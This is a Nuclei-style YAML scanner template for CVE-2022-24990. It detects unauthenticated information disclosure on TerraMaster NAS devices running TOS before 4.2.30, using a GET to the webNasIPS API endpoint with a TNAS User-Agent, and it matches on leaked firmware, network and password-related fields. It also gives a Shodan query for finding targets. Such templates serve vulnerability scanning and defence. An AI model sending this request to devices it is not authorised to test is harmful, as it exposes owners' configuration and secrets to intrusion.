41 lines
1.1 KiB
YAML
41 lines
1.1 KiB
YAML
id: CVE-2022-24990
|
|
|
|
info:
|
|
name: TerraMaster TOS < 4.2.30 - Server Information Disclosure
|
|
author: dwisiswant0
|
|
severity: medium
|
|
description: |
|
|
TerraMaster NAS devices running TOS prior to version
|
|
4.2.30 is vulnerable to information disclosure
|
|
reference: https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
|
|
metadata:
|
|
shodan-query: TerraMaster
|
|
tags: cve,cve2022,terramaster,exposure
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/module/api.php?mobile/webNasIPS"
|
|
headers:
|
|
User-Agent: "TNAS"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
- "TerraMaster"
|
|
condition: and
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "webNasIPS successful"
|
|
- "(ADDR|(IFC|PWD|[DS]AT)):"
|
|
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
|
|
condition: or |